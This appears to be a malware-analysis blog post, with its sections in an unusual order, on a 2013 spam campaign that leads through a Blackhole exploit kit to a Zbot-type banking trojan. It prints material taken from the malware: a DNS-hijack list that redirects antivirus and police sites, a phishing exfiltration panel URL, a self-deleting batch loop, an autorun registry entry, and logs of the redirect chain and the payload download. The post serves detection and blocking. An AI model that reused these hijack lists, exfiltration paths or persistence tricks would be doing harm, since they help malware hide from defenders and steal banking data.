[DNS_REDIRECTION:data] www.avast.ru=209.85.229.104
[DNS_REDIRECTION:data] avast.com=209.85.229.104
[DNS_REDIRECTION:data] www.avast.com=209.85.229.104
[DNS_REDIRECTION:data] onlinescan.avast.com=209.85.229.104
[DNS_REDIRECTION:data] download1.avast.com=209.85.229.104
[DNS_REDIRECTION:data] download2.avast.com=209.85.229.104
[DNS_REDIRECTION:data] download3.avast.com=209.85.229.104
[DNS_REDIRECTION:data] download4.avast.com=209.85.229.104
[DNS_REDIRECTION:data] download5.avast.com=209.85.229.104
[DNS_REDIRECTION:data] download6.avast.com=209.85.229.104
[DNS_REDIRECTION:data] download7.avast.com=209.85.229.104
[DNS_REDIRECTION:data] free.avg.com=209.85.229.104
[DNS_REDIRECTION:data] au.norton.com=209.85.229.104
[DNS_REDIRECTION:data] trustdefender.com=209.85.229.104
[DNS_REDIRECTION:data] avg.com=209.85.229.104
[DNS_REDIRECTION:data] www.avg.com=209.85.229.104
[DNS_REDIRECTION:data] sshop.avg.com=209.85.229.104
[DNS_REDIRECTION:data] pctools.com=209.85.229.104
[DNS_REDIRECTION:data] www.grisoft.cz=209.85.229.104
[DNS_REDIRECTION:data] www.grisoft.com=209.85.229.104
[DNS_REDIRECTION:data] free.grisoft.com=209.85.229.104
[DNS_REDIRECTION:data] bitdefender.com=209.85.229.104
[DNS_REDIRECTION:data] www.bitdefender.com=209.85.229.104
[DNS_REDIRECTION:data] msecn.net=209.85.229.104
[DNS_REDIRECTION:data] bitdefender.de=209.85.229.104
[DNS_REDIRECTION:data] www.bitdefender.de=209.85.229.104
[DNS_REDIRECTION:data] bitdefender.com.ua=209.85.229.104
[DNS_REDIRECTION:data] www.bitdefender.com.ua=209.85.229.104
[DNS_REDIRECTION:data] bitdefender.ru=209.85.229.104
[DNS_REDIRECTION:data] www.bitdefender.ru=209.85.229.104
[DNS_REDIRECTION:data] myaccount.bitdefender.co,=209.85.229.104
[DNS_REDIRECTION:data] download.bitdefender.com=209.85.229.104
[DNS_REDIRECTION:data] ftp.bitdefender.com=209.85.229.104
[DNS_REDIRECTION:data] forum.bitdefender.com=209.85.229.104
[DNS_REDIRECTION:data] upgrade.bitdefender.com=209.85.229.104
[DNS_REDIRECTION:data] agnitum.ru=209.85.229.104
[DNS_REDIRECTION:data] www.agnitum.ru=209.85.229.104
[DNS_REDIRECTION:data] agnitum.com=209.85.229.104
[DNS_REDIRECTION:data] www.agnitum.com=209.85.229.104
[DNS_REDIRECTION:data] agnitum.de=209.85.229.104
[DNS_REDIRECTION:data] www.agnitum.de=209.85.229.104
[DNS_REDIRECTION:data] outpostfirewall.com=209.85.229.104
[DNS_REDIRECTION:data] www.outpostfirewall.com=209.85.229.104
[DNS_REDIRECTION:data] dl1.agnitum.com=209.85.229.104
[DNS_REDIRECTION:data] dl2.agnitum.com=209.85.229.104
[DNS_REDIRECTION:data] antivirus.comodo.com=209.85.229.104
[DNS_REDIRECTION:data] comodo.com=209.85.229.104
[DNS_REDIRECTION:data] www.comodo.com=209.85.229.104
[DNS_REDIRECTION:data] forums.comodo.com=209.85.229.104
[DNS_REDIRECTION:data] comodogroup.com=209.85.229.104
[DNS_REDIRECTION:data] www.comodogroup.com=209.85.229.104
[DNS_REDIRECTION:data] personalfirewall.comodo.com=209.85.229.104
[DNS_REDIRECTION:data] www.personalfirewall.com=209.85.229.104
[DNS_REDIRECTION:data] hackerguardian.com=209.85.229.104
[DNS_REDIRECTION:data] www.hackerguardian.com=209.85.229.104
[DNS_REDIRECTION:data] www.nsclean.com=209.85.229.104
[DNS_REDIRECTION:data] nsclean.com=209.85.229.104
[DNS_REDIRECTION:data] clamav.net=209.85.229.104
[DNS_REDIRECTION:data] www.clamav.net=209.85.229.104
[DNS_REDIRECTION:data] db.local.clamav.net=209.85.229.104
[DNS_REDIRECTION:data] clamsupport.sourcefire.com=209.85.229.104
[DNS_REDIRECTION:data] lurker.clamav.net=209.85.229.104
[DNS_REDIRECTION:data] wiki.clamav.net=209.85.229.104
[DNS_REDIRECTION:data] w32.clamav.net=209.85.229.104
[DNS_REDIRECTION:data] lists.clamav.net=209.85.229.104
[DNS_REDIRECTION:data] clamwin.com=209.85.229.104
[DNS_REDIRECTION:data] www.clamwin.com=209.85.229.104
[DNS_REDIRECTION:data] ru.clamwin.com=209.85.229.104
[DNS_REDIRECTION:data] gietl.com=209.85.229.104
[DNS_REDIRECTION:data] www.gietl.com=209.85.229.104
[DNS_REDIRECTION:data] clamav.dyndns.org=209.85.229.104
[DNS_REDIRECTION:data] f-secure.com=209.85.229.104
[DNS_REDIRECTION:data] www.f-secure.com=209.85.229.104
[DNS_REDIRECTION:data] support.f-secure.com=209.85.229.104
[DNS_REDIRECTION:data] f-secure.ru=209.85.229.104
[DNS_REDIRECTION:data] www.f-secure.ru=209.85.229.104
[DNS_REDIRECTION:data] ftp.f-secure.com=209.85.229.104
[DNS_REDIRECTION:data] europe.f-secure.com=209.85.229.104
[DNS_REDIRECTION:data] www.europe.f-secure.com=209.85.229.104
[DNS_REDIRECTION:data] f-secure.de=209.85.229.104
[DNS_REDIRECTION:data] www.f-secure.de=209.85.229.104
[DNS_REDIRECTION:data] support.f-secure.de=209.85.229.104
[DNS_REDIRECTION:data] ftp.f-secure.de=209.85.229.104
[DNS_REDIRECTION:data] f-secure.co.uk=209.85.229.104
[DNS_REDIRECTION:data] www.f-secure.co.uk=209.85.229.104
[DNS_REDIRECTION:data] retail.sp.f-secure.com=209.85.229.104
[DNS_REDIRECTION:data] retail01.sp.f-secure.com=209.85.229.104
[DNS_REDIRECTION:data] retail02.sp.f-secure.com=209.85.229.104
[DNS_REDIRECTION:data] ftp.europe.f-secure.com=209.85.229.104
[DNS_REDIRECTION:data] norman.com=209.85.229.104
[DNS_REDIRECTION:data] www.norman.com=209.85.229.104
[DNS_REDIRECTION:data] download.norman.no=209.85.229.104
[DNS_REDIRECTION:data] sandbox.norman.no=209.85.229.104
[DNS_REDIRECTION:data] norman.no=209.85.229.104
[DNS_REDIRECTION:data] www.norman.no=209.85.229.104
[DNS_REDIRECTION:data] niuone.norman.no=209.85.229.104
[DNS_REDIRECTION:data] pandasecurity.com=209.85.229.104
[DNS_REDIRECTION:data] www.pandasecurity.com=209.85.229.104
[DNS_REDIRECTION:data] viruslab.ru=209.85.229.104
[DNS_REDIRECTION:data] www.viruslab.ru=209.85.229.104
[DNS_REDIRECTION:data] pandasoftware.com=209.85.229.104
[DNS_REDIRECTION:data] www.pandasoftware.com=209.85.229.104
[DNS_REDIRECTION:data] acs.pandasoftware.com=209.85.229.104
[DNS_REDIRECTION:data] www.pandasoftware.es=209.85.229.104
[DNS_REDIRECTION:data] anti-virus.by=209.85.229.104
[DNS_REDIRECTION:data] www.anti-virus.by=209.85.229.104
[DNS_REDIRECTION:data] virusblokada.ru=209.85.229.104
[DNS_REDIRECTION:data] www.virusblokada.ru=209.85.229.104
[DNS_REDIRECTION:data] vba32.de=209.85.229.104
[DNS_REDIRECTION:data] www.vba32.de=209.85.229.104
[DNS_REDIRECTION:data] ftp.nai.com=209.85.229.104
[DNS_REDIRECTION:data] secuser.com=209.85.229.104
[DNS_REDIRECTION:data] www.secuser.com=209.85.229.104
[DNS_REDIRECTION:data] tds.diamondcs.com.au=209.85.229.104
[DNS_REDIRECTION:data] windowsupdate.microsoft.com=209.85.229.104
[DNS_REDIRECTION:data] lavasoftusa.com=209.85.229.104
[DNS_REDIRECTION:data] www.lavasoftusa.com=209.85.229.104
[DNS_REDIRECTION:data] lavasoftusa.de=209.85.229.104
[DNS_REDIRECTION:data] www.lavasoftusa.de=209.85.229.104
[DNS_REDIRECTION:data] diamondcs.com.au=209.85.229.104
[DNS_REDIRECTION:data] shop.ca.com=209.85.229.104
[DNS_REDIRECTION:data] downloads.my-etrust.com=209.85.229.104
[DNS_REDIRECTION:data] v4.windowsupdate.microsoft.com=209.85.229.104
[DNS_REDIRECTION:data] v5.windowsupdate.microsoft.com=209.85.229.104
[DNS_REDIRECTION:data] noadware.net=209.85.229.104
[DNS_REDIRECTION:data] www.noadware.net=209.85.229.104
[DNS_REDIRECTION:data] zonelabs.com=209.85.229.104
[DNS_REDIRECTION:data] www.zonelabs.com=209.85.229.104
[DNS_REDIRECTION:data] moosoft.com=209.85.229.104
[DNS_REDIRECTION:data] www.moosoft.com=209.85.229.104
[DNS_REDIRECTION:data] secuser.model-fx.com=209.85.229.104
[DNS_REDIRECTION:data] pccreg.antivirus.com=209.85.229.104
[DNS_REDIRECTION:data] k-otik.com=209.85.229.104
[DNS_REDIRECTION:data] vupen.com=209.85.229.104
[DNS_REDIRECTION:data] www.vupen.com=209.85.229.104
[DNS_REDIRECTION:data] housecall.trendmicro.com=209.85.229.104
[DNS_REDIRECTION:data] trendmicro.com=209.85.229.104
[DNS_REDIRECTION:data] www.trendmicro.com=209.85.229.104
[DNS_REDIRECTION:data] us.trendmicro.com=209.85.229.104
[DNS_REDIRECTION:data] uk.trendmicro.com=209.85.229.104
[DNS_REDIRECTION:data] de.trendmicro.com=209.85.229.104
[DNS_REDIRECTION:data] fr.trendmicro.com=209.85.229.104
[DNS_REDIRECTION:data] es.trendmicro.com=209.85.229.104
[DNS_REDIRECTION:data] au.trendmicro.com=209.85.229.104
[DNS_REDIRECTION:data] it.trendmicro.com=209.85.229.104
[DNS_REDIRECTION:data] br.trendmicro.com=209.85.229.104
[DNS_REDIRECTION:data] antivirus.cai.com=209.85.229.104
[DNS_REDIRECTION:data] sophos.com=209.85.229.104
[DNS_REDIRECTION:data] www.sophos.com=209.85.229.104
[DNS_REDIRECTION:data] securitoo.com=209.85.229.104
[DNS_REDIRECTION:data] nordnet.com=209.85.229.104
[DNS_REDIRECTION:data] www.nordnet.com=209.85.229.104
[DNS_REDIRECTION:data] avgfrance.com=209.85.229.104
[DNS_REDIRECTION:data] www.avgfrance.com=209.85.229.104
[DNS_REDIRECTION:data] antivirus-online.de=209.85.229.104
[DNS_REDIRECTION:data] www.antivirus-online.de=209.85.229.104
[DNS_REDIRECTION:data] ftp.esafe.com=209.85.229.104
[DNS_REDIRECTION:data] ftp.microworldsystems.com=209.85.229.104
[DNS_REDIRECTION:data] ftp.ca.co=209.85.229.104
[DNS_REDIRECTION:data] files.trendmicro-europe.com=209.85.229.104
[DNS_REDIRECTION:data] inline-software.de=209.85.229.104
[DNS_REDIRECTION:data] ravantivirus.com=209.85.229.104
[DNS_REDIRECTION:data] www.ravantivirus.com=209.85.229.104
[DNS_REDIRECTION:data] f-prot.com=209.85.229.104
[DNS_REDIRECTION:data] www.f-prot.com=209.85.229.104
[DNS_REDIRECTION:data] files.f-prot.com=209.85.229.104
[DNS_REDIRECTION:data] secure.f-prot.com=209.85.229.104
[DNS_REDIRECTION:data] vsantivirus.com=209.85.229.104
[DNS_REDIRECTION:data] www.vsantivirus.com=209.85.229.104
[DNS_REDIRECTION:data] openantivirus.org=209.85.229.104
[DNS_REDIRECTION:data] www.openantivirus.org=209.85.229.104
[DNS_REDIRECTION:data] www3.ca.com=209.85.229.104
[DNS_REDIRECTION:data] dialognauka.ru=209.85.229.104
[DNS_REDIRECTION:data] www.dialognauka.ru=209.85.229.104
[DNS_REDIRECTION:data] anti-virus-software-review.com=209.85.229.104
[DNS_REDIRECTION:data] www.anti-virus-software-review.com=209.85.229.104
[DNS_REDIRECTION:data] www.vet.com.au=209.85.229.104
[DNS_REDIRECTION:data] antiviraldp.com=209.85.229.104
[DNS_REDIRECTION:data] www.antiviraldp.com=209.85.229.104
[DNS_REDIRECTION:data] www.proantivirus.com=209.85.229.104
[DNS_REDIRECTION:data] pestpatrol.com=209.85.229.104
[DNS_REDIRECTION:data] www.pestpatrol.com=209.85.229.104
[DNS_REDIRECTION:data] simplysup.com=209.85.229.104
[DNS_REDIRECTION:data] www.simplysup.com=209.85.229.104
[DNS_REDIRECTION:data] misec.net=209.85.229.104
[DNS_REDIRECTION:data] www.misec.net=209.85.229.104
[DNS_REDIRECTION:data] www1.my-etrust.com=209.85.229.104
[DNS_REDIRECTION:data] authentium.com=209.85.229.104
[DNS_REDIRECTION:data] www.authentium.com=209.85.229.104
[DNS_REDIRECTION:data] finjan.com=209.85.229.104
[DNS_REDIRECTION:data] www.finjan.com=209.85.229.104
[DNS_REDIRECTION:data] www.ikarus-software.at=209.85.229.104
[DNS_REDIRECTION:data] www.ika-rus.com=209.85.229.104
[DNS_REDIRECTION:data] ika-rus.com=209.85.229.104
[DNS_REDIRECTION:data] tinysoftware.com=209.85.229.104
[DNS_REDIRECTION:data] www.tinysoftware.com=209.85.229.104
[DNS_REDIRECTION:data] visualizesoftware.com=209.85.229.104
[DNS_REDIRECTION:data] www.visualizesoftware.com=209.85.229.104
[DNS_REDIRECTION:data] kerio.com=209.85.229.104
[DNS_REDIRECTION:data] www.kerio.com=209.85.229.104
[DNS_REDIRECTION:data] www.kerio.eu=209.85.229.104
[DNS_REDIRECTION:data] www.zonelabs.com=209.85.229.104
[DNS_REDIRECTION:data] zonelog.co.uk=209.85.229.104
[DNS_REDIRECTION:data] www.zonelog.co.uk=209.85.229.104
[DNS_REDIRECTION:data] webroot.com=209.85.229.104
[DNS_REDIRECTION:data] www.webroot.com=209.85.229.104
[DNS_REDIRECTION:data] www.lavasoft.nu=209.85.229.104
[DNS_REDIRECTION:data] spywareguide.com=209.85.229.104
[DNS_REDIRECTION:data] www.spywareguide.com=209.85.229.104
[DNS_REDIRECTION:data] spyblocker-software.com=209.85.229.104
[DNS_REDIRECTION:data] www.spyblocker-software.com=209.85.229.104
[DNS_REDIRECTION:data] www.spamhaus.org=209.85.229.104
[DNS_REDIRECTION:data] spamcop.net=209.85.229.104
[DNS_REDIRECTION:data] www.spamcop.net=209.85.229.104
[DNS_REDIRECTION:data] bobbear.co.uk=209.85.229.104
[DNS_REDIRECTION:data] www.bobbear.co.uk=209.85.229.104
[DNS_REDIRECTION:data] domaintools.com=209.85.229.104
[DNS_REDIRECTION:data] www.domaintools.com=209.85.229.104
[DNS_REDIRECTION:data] centralops.net=209.85.229.104
[DNS_REDIRECTION:data] www.centralops.net=209.85.229.104
[DNS_REDIRECTION:data] www.robtex.com=209.85.229.104
[DNS_REDIRECTION:data] dnsstuff.com=209.85.229.104
[DNS_REDIRECTION:data] www.dnsstuff.com=209.85.229.104
[DNS_REDIRECTION:data] ripe.net=209.85.229.104
[DNS_REDIRECTION:data] www.ripe.net=209.85.229.104
[DNS_REDIRECTION:data] www.met.police.uk=209.85.229.104
[DNS_REDIRECTION:data] nbi.gov.ph=209.85.229.104
[DNS_REDIRECTION:data] www.nbi.gov.ph=209.85.229.104
[DNS_REDIRECTION:data] www.police.gov.hk=209.85.229.104
[DNS_REDIRECTION:data] treasury.gov=209.85.229.104
[DNS_REDIRECTION:data] www.treasury.gov=209.85.229.104
[DNS_REDIRECTION:data] cybercrime.gov=209.85.229.104
[DNS_REDIRECTION:data] www.cybercrime.gov=209.85.229.104
[DNS_REDIRECTION:data] www.cybercrime.ch=209.85.229.104
[DNS_REDIRECTION:data] enisa.europa.eu=209.85.229.104
[DNS_REDIRECTION:data] www.enisa.europa.eu=209.85.229.104
[DNS_REDIRECTION:data] www.interpol.int=209.85.229.104
[DNS_REDIRECTION:data] www.fsa.gov.uk=209.85.229.104
[DNS_REDIRECTION:data] www.companies-house.gov.uk=209.85.229.104
[DNS_REDIRECTION:data] fraudaid.com=209.85.229.104
[DNS_REDIRECTION:data] www.fraudaid.com=209.85.229.104
[DNS_REDIRECTION:data] scambusters.org=209.85.229.104
[DNS_REDIRECTION:data] www.scambusters.org=209.85.229.104
[DNS_REDIRECTION:data] spamtrackers.eu=209.85.229.104
[DNS_REDIRECTION:data] www.spamtrackers.eu=209.85.229.104

What had been sent?

Eventhough we are limited in answering this question, we can say that what had been logged and phished above was all encrypted and sent to the remote host. Phishing data will be sent to the defined gateway with the HTTP/POST method via form, with the URL like below: (this is shared for blocking purpose)

h00p://[domain-name]/panel/icq.php

Moral of the story

Instead to pass the sample as per it is to the AV industry and let the industry does the work, we should also broaden ourself with the information of "which malware, does what, with what". I understand there are so few information of the banking trojans for the reading reference to end users, I hope this post is not only to answer fellow researcher's questions but as one of important reference to mitigate the infection of this trojan in the future.

If you find the specific malware match to the description, help the industry by providing your thoughts, ideas and reference related to the infection you handle/spot. Your concern is the best weapon to fight these stealers. And do not be afraid to make mistake in reporting the infection incident, there is no such EXACT criteria when we are dealing with these stuffs anyway, all people are learners here. I urgue you to explain incident with learning as much as you can too.

In our circle there are plenty good blog posts of malware analysis written by the very dedicated individual researchers, read & follow them is one of our best advise.

#MalwareMustDie!

Infection Summary:

Recently we're back into full research, and go straight to all junk mails on campaign that infecting malware. Today I bumped into the malvertisement spam email, which I thought a bit "unusual", as per below:
Since some of you might see the same sample, so I thought it's worth to explain what happened, unexpectedly it lead me to a complicated analysis. Believe me, this case is worth to dig further, and what I wrote here is a short version of the overall scheme.

The marked link is a redirection page to the Blackhole Landing Page at:

h00p://uninstallingauroras.net/closest/i9jfuhioejskveohnuojfir.php

h00p://papakarlo24.ｒu/wp-gdt.php?H00OTWYN3DI3Z4
Resolving papakarlo24.ｒu... seconds 0.00, 92.38.227.2
Caching papakarlo24.ｒu => 92.38.227.2
Connecting to papakarlo24.ｒu|92.38.227.2|:80... seconds 0.00, connected.
  :
GET /wp-gdt.php?H00OTWYN3DI3Z4 h00p/1.0
Host: papakarlo24.ｒu
h00p request sent, awaiting response...
  :
h00p/1.1 302 Moved Temporarily
Server: nginx/0.8.55
Date: Wed, 29 May 2013 08:16:21 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Location: h00p://uninstallingauroras・net/cloｓest/i9jfuhioejskveohnuojfir.php
Content-Length: 0
  :
302 Moved Temporarily
Location: h00p://uninstallingauroras・net/closest/i9jfuhioejskveohnuojfir.php [following]
  :
h00p://uninstallingauroras・net/cloｓest/i9jfuhioejskveohnuojfir.php
conaddr is: 92.38.227.2
Resolving uninstallingauroras.net... seconds 0.00, 80.78.247.227
Caching uninstallingauroras.net => 80.78.247.227

h00p://uninstallingauroras.net/closest/i9jfuhioejskveohnuojfir.php?yxt=1n:1j:2w:1m:1i&jnhzkr=2v:3g:30&vzk=1k:1f:2w:1m:31:1o:1l:1l:30:31&jitgppkh=1k:1d:1f:1d:1g:1d:1f
h00p://uninstallingauroras.net/closest/i9jfuhioejskveohnuojfir.php?nvxzelny=1n:1j:2w:1m:1i&msiinq=37&hsbvq=1k:1f:2w:1m:31:1o:1l:1l:30:31&kfkojw=1k:1d:1f:1d:1g:1d:1f

h00p://uninstallingauroras.net/closest/i9jfuhioejskveohnuojfir.php?orsjgvtp=1n:1j:2w:1m:1i&zxlegtgp=1k:1f:2w:1m:31:1o:1l:1l:30:31&tqdybltx=1h&mryvsc=pcyxjux&sctxbc=liolty

Latest URLs hosted in this IP address detected by at least one 
URL scanner or malicious URL dataset:
4/39 2013-05-29 14:08:16 h00p://notablereward.com/closest/i9jfuhioejskveohnuojfir.php
4/39 2013-05-29 13:07:47 h00p://agefsndac.com/closest/i9jfuhioejskveohnuojfir.php
1/38 2013-05-28 18:17:40 h00p://blockedgerman.com/closest/i9jfuhioejskveohnuojfir.php

Latest malware  that are detected by at least one antivirus solution and 
were downloaded by VirusTotal from the IP address provided:
2/47 2013-05-29 14:08:24 28134f652bbcfddd156423010bd60c481da541271314872ca4b34645dc8c0830
4/47 2013-05-29 00:20:29 71df67ecbd66dce7c66d30bd32b13ae3f0f1c39d24741538f1543c1f71ee8dd0

Sample : ./sample.exe
MD5    : 0d2af51b28138ab79074dedad6c6a00d
SHA256 : 6d41edd7f3964b191d130d16ca8df834874eb4056a7d4287022aa910b3450409

   SHA256:
   6d41edd7f3964b191d130d16ca8df834874eb4056a7d4287022aa910b3450409
   SHA1: 5385cc8e975ed8748fe8937853d1eb0f55a34917
   MD5: 0d2af51b28138ab79074dedad6c6a00d
   File size: 91.5 KB ( 93707 bytes )
   File name: sample.exe
   File type: Win32 EXE
   Tags: peexe
   Detection ratio: 19 / 47
   Analysis date: 2013-05-29 09:09:50 UTC ( 1 hour, 7 minutes ago )

F-Secure                 : Trojan.GenericKDZ.19645
DrWeb                    : Trojan.DownLoad3.23197
GData                    : Trojan.GenericKDZ.19645
Symantec                 : WS.Reputation.1
AhnLab-V3                : Trojan/Win32.Tepfer
McAfee-GW-Edition        : PWS-Zbot-FAQD!0D2AF51B2813
TrendMicro-HouseCall     : TROJ_GEN.R47H1ES13
MicroWorld-eScan         : Trojan.GenericKDZ.19645
Avast                    : Win32:Dropper-gen [Drp]
Kaspersky                : Trojan-Spy.Win32.Zbot.lvxs
BitDefender              : Trojan.GenericKDZ.19645
McAfee                   : PWS-Zbot-FAQD!0D2AF51B2813
Malwarebytes             : Backdoor.Bot.ST
Rising                   : Win32.Asim.a
Panda                    : Trj/CI.A
Fortinet                 : W32/Zbot.LVXS!tr
ESET-NOD32               : Win32/Wigon.PH
Emsisoft                 : Trojan.Win32.Zbot (A)
Comodo                   : UnclassifiedMalware

How & from where was it sent from?

↑You'll see a client spambot tool (or MUA) with usually used below signatures to send such malvertisement:

Microsoft SMTP Server id 8.0.685.24;
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.9) 
Gecko/20100921 Thunderbird/3.1.4

Received: from unknown (HELO Spammer/FQDN) (Spammer Used MTA IP/x.x.x.x)
MIME-Version: 1.0
Status: RO

A bit of Exploit Kit & PDF Exploit analysis

It's a Blackhole v2.x, the "/closest/" type, can't afford to make a miss in wacking this one, can be accessed one hit at a time/IP. The "material" needed to grab this is all in the spam email itself. So be sure you know the source of these. Snipped PluginDetect "head" code:
It used the plugin detect (as always) ver 0.7.9. with weaponized in the PDF exploit infection only as per coded here: I used our previously published formula to crack urls: Downloading these PDF is as per the accessing the landing page, be careful of your chances. Shortly+frankly, I decoded first PDF for payload URL & runs the second for confirming the link. This is the JS/evil code of the first PDF: Just runs it in the PDF/JS environment to get the eval values, contains: BoF:
CVE-2009-0927 exploit:

Exploit method per varied Adobe versions via plugin detection:
To hit this shellcode as per encoded (see the decode logic under it) here: Shellcode itself is not that special, run the decode part to get this shellcode binary:
Payload url is at the bottom of it.

For shutdown evidence; the tag of the payload during downloading(log):

HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Wed, 29 May 2013 08:50:05 GMT
Content-Type: application/x-msdownload
Content-Length: 93707
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Pragma: public
Expires: Wed, 29 May 2013 08:50:10 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="contacts.exe"
Content-Transfer-Encoding: binary
  :
200 OK
Length: 93707 (92K) [application/x-msdownload]
Saving to: `sample.exe'
2013-05-29 17:50:10 (45.5 KB/s) - `sample.exe' saved [93707/93707]

What Payload Malware is this?

Firstly please see the details available in VT for I will skip those.

The payload register the autorun below:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\xoxkycomvoly(RANDOM)
→"C:\Documents and Settings\User\xoxkycomvoly.exe"

CopyFileA｛
   lpExistingFileName: "c:\test\sample.exe", 
   lpNewFileName: "C:\Documents and Settings\User\xoxkycomvoly.exe", (RANDOM)
   bFailIfExists: 0x0 ｝

:repeat
del %s
if exist %s goto :repeat
del %%0

If you squeeze the binary further you'll get the important traces as per below:

These are the HTTP used methods..

http://%s/?ptrxcz_%s
http://%s/
https://%s
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Accept: */*
Accept-Language: en
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: %d
Accept-Encoding: gzip, deflate
gzip
POST
GET

IsWow64Process
UndefinedOS
Win8
WinServer2012
Win7
WinServer2008R2
WinServer2008
Vista
WinHomeServer
WinServer2003R2
WinServer2003
WinXP64
WinXP
Win2K

// relay SMTP aftered..

smtp.compuserve.com
mail.airmail.net
smtp.directcon.net
smtp.sbcglobal.yahoo.com
smtp.mail.yahoo.com
smtp.live.com

reactionsearch.com
picsnet.com
mville.edu
oakwood.org
intelnet.net.gt
optonline.net
cox.net
pga.com
rcn.com
vampirefreaks.com
tiscali.co.uk
msu.edu
freenet.de
bluewin.ch
o2.pl
cfl.rr.com
worldnetatt.net
uakron.edu
comcast.net
centrum.cz
axelero.hu
aon.at
oakland.edu
ukr.net
posten.se
talstar.com
cnet.com
emailmsn.com
yahoo.com.hk
vodafone.nl
zoomtown.com
otakumail.com
netsync.net
grar.com
stc.com.sa
col.com
gallatinriver.net
worldonline.co.uk
aruba.it
bluewin.com
zoomnet.net
gcsu.edu
amazon.com
microtek.com
voicestream.com
tellmeimcute.com
bmw.com
backaviation.com
oregonstate.edu
earthlink.net
cablelan.net
floodcity.net
uplink.net
mindspring.com
clarksville.com
dr.com
shmais.com
sexstories.com
cwnet.com
chickensys.com
gravityboard.com
happyhippo.com
midway.edu
oakwood.org
intelnet.net.gt
blackplanet.com
tampabay.rr.com
gmx.net
juno.com
vampirefreaks.com
canada.com
worldnetatt.net
beeone.de
idea.com
boardermail.com
arcor.de
verizonwireless.com
mediom.com
iw.com
passagen.se
iupui.edu
ufl.edu
jwu.edu
uga.edu
music.com
accountant.com
ministryofsound.net
the-beach.net
metallica.com
vodafone.com
zdnetmail.com
hoymail.com
iwon.com
accessus.net
cbunited.com
pchome.com.tw
kazza.com
cytanet.com.cy
frisurf.no
parrotcay.como.bz
willinet.net
claranet.fr
kw.com
caixa.gov.br
frostburg.edu
intuit.com
actuslendlease.com
rowdee.com
vodafone.nl
feton.net
wcsu.edu
ricochet.com
embarqmail.com
allstream.net
mynet.com
kcrr.com
south.net
ig.com.br
atkearney.com
colorado.edu
zoomnet.net
creighton.edu
amazon.com
mvts.com
potamkinmitsubishi.com
lansdownecollege.com
mania.com
marchmail.com
anetsbuys.com
yatroo.com
bassettfurniture.com
machlink.com
nccn.net
floodcity.net
maui.net
earthlink.com
doctor.com
mexico.com
sexstories.com
penn.com
aussiestockforums.com
bendcable.com
ipeg.com
mediom.com
free.fr
ufl.edu
www.aol.com
hotmale.com
cox.com
ministryofsound.net
stargate.net
orange.pl
mzsg.at
imaginet.com
charter.com
pandora.be
iwon.com
windstream.net
oakland.edu
suscom.net
metrocast.net
migente.com
erzt.com
willinet.net
claranet.fr
kw.com
rockford.edu
emailmsn.com
uymail.com
xtra.co.nz
brettlarson.com
badactor.us
stc.com.sa
t-mobel.com
yahoo.com.cn
gatespeed.com
itexas.net
yahoo.com.tw
diamondcpu.com
vail.com
clear.net.nz
gallatinriver.net
ia.telecom.net
idealcollectables.com
number1.net
agilent.com
in.com
windermere.com
mts.net
sscomputing.com
primeline.com
indosat.com
lansdownecollege.com
springsips.com
tellmeimcute.com
chataddict.com
expn.com
earthlink.net
surfglobal.net